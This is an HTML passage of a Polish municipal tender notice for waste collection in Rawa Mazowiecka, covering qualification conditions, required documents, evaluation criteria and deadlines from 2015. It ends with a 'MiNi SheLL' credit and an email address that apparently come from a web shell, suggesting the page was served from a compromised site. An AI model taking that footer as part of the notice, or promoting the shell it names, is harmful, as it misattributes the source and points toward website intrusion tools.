<ul class="kh_indent_1"><li><p>Posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania tj.: a) aktualny wpis do rejestru działalności regulowanej prowadzonego przez Burmistrza Miasta Rawa Mazowiecka w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości, b) aktualne zezwolenie starosty na transport oraz zbieranie odpadów komunalnych, w tym odpadów niebezpiecznych oraz odpadów komunalnych, c)aktualny wpis do rejestru podmiotów zbierających zużyty sprzęt elektryczny i elektroniczny prowadzonego przez Głównego Inspektora Ochrony Środowiska.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadania wiedzy i doświadczenia, tj.: Wykonawca musi wskazać, że wykonał w okresie ostatnich 3 lat (a jeśli okres prowadzenia działalności jest krótszy - w tym okresie), usługi odbierania odpadów komunalnych z zamieszkałych nieruchomości, o łącznej masie odebranych odpadów komunalnych w ciągu następujących po sobie 12 miesięcy (lub w krótszym okresie), co najmniej 700Mg., załączając dowody potwierdzające, że usługa została wykonana należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia, tj.: a) posiada co najmniej 2 pojazdy przystosowane do odbierania zmieszanych odpadów komunalnych, b) posiada co najmniej 2 pojazdy przystosowane do odbierania selektywnie zebranych odpadów komunalnych, c) posiada co najmniej 1 pojazd do odbierania odpadów bez funkcji kompaktującej. d) posiada odpowiednio przygotowaną bazę transportowo-magazynową w odległości nie większej niż 60 km od granicy gminy miasto, z terenu której odbierane są odpady komunalne zgodnie z Rozporządzeniem Ministra Środowiska z dnia 11 stycznia 2013r. w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości (Dz. U. z 2013r., poz. 122). e) na czas trwania umowy Wykonawca utworzy Biuro Obsługi na terenie miasta Rawa Mazowiecka umocowane do rozwiązywania bieżących problemów związanych z obsługą mieszkańców. Adres i numery kontaktowe zostaną przekazane do Urzędu Miasta przed podpisaniem umowy.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia, tj.: a) posiada co najmniej 2 pojazdy przystosowane do odbierania zmieszanych odpadów komunalnych, b) posiada co najmniej 2 pojazdy przystosowane do odbierania selektywnie zebranych odpadów komunalnych, c) posiada co najmniej 1 pojazd do odbierania odpadów bez funkcji kompaktującej. d) posiada odpowiednio przygotowaną bazę transportowo-magazynową w odległości nie większej niż 60 km od granicy gminy miasto, z terenu której odbierane są odpady komunalne zgodnie z Rozporządzeniem Ministra Środowiska z dnia 11 stycznia 2013r. w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości (Dz. U. z 2013r., poz. 122). e) na czas trwania umowy Wykonawca utworzy Biuro Obsługi na terenie miasta Rawa Mazowiecka umocowane do rozwiązywania bieżących problemów związanych z obsługą mieszkańców. Adres i numery kontaktowe zostaną przekazane do Urzędu Miasta przed podpisaniem umowy.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Sytuacji ekonomicznej i finansowej, tj.: a) Wykonawca musi posiadać środki finansowe lub zdolność kredytową w wysokości nie mniejszej niż 50 000 zł (słownie: pięćdziesiąt tysięcy złotych),</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.2. Aktualny wpis do rejestru działalności regulowanej prowadzonego przez Burmistrza Miasta Rawa Mazowiecka w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości. 1.3. Aktualne zezwolenie starosty na transport oraz zbieranie odpadów komunalnych, w tym niebezpiecznych odpadów komunalnych. 1.4.Wpis do rejestru zbierających zużyty sprzęt elektryczny i elektroniczny prowadzonego przez Głównego Inspektora Ochrony Środowiska. Do wykazu przedmiotowego narzędzi należy dołączyć ważne na dzień otwarcia ofert kopie dowodów rejestracyjnych dla wszystkich wymienionych w wykazie pojazdów.1.7. Informacje o posiadaniu bazy transportowo-magazynowej w odległości nie większej niż 60km od granicy Gminy Miasto, z terenu której odbierane są odpady komunalne oraz utworzeniu Biura Obsługi Klienta na terenie miasta Rawa Mazowiecka. 3. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej zastosowanie znajduje § 4 rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013r. w sprawie rodzajów dokumentów, jakie może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz. U. z 2013r poz. 231). 4. Oświadczenia, o których mowa w cz. XIV SIWZ należy przedstawić w formie oryginału, pozostałe dokumenty należy złożyć w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez osobę-y uprawnioną-e do reprezentacji Wykonawcy. 5. Dokumenty sporządzane w języku obcym są składane wraz z tłumaczeniem przysięgłym na język polski.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 96</li>
<li>2 - Jakość obsługi - 4</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http//www.bip.rawamazowiecka.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Pl. Piłsudskiego 4, 96-200 Rawa Mazowiecka pok. 17.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.11.2015 godzina 12:00, miejsce: Biuro podawcze Urzędu Miasta Rawa Mazowiecka, Pl. Piłsudskiego 5, pok. nr 17..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com